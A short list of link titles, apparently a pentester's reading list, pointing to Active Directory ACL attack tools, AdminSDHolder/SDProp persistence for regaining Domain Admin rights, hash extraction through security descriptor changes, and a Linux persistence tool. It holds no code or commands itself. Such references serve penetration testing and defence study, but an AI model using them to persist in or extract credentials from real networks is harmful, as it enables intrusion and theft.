  • GitHub - samratashok/RACE: RACE is a PowerShell module for executing ACL attacks against Windows targets.
  • Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights - Active Directory Security
  • AdminSDHolder - The Hacker Recipes
  • AD-Pentesting-Tools/Invoke-SDPropagator.ps1 at main · theyoge/AD-Pentesting-Tools - GitHub
  • Remote Hash Extraction On Demand Via Host Security Descriptor Modification - Posts By SpecterOps Team Members
  • GitHub - HarmJ0y/DAMP: The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification
  • GitHub - MatheuZSecurity/D3m0n1z3dShell: Demonized Shell is an Advanced Tool for persistence in linux.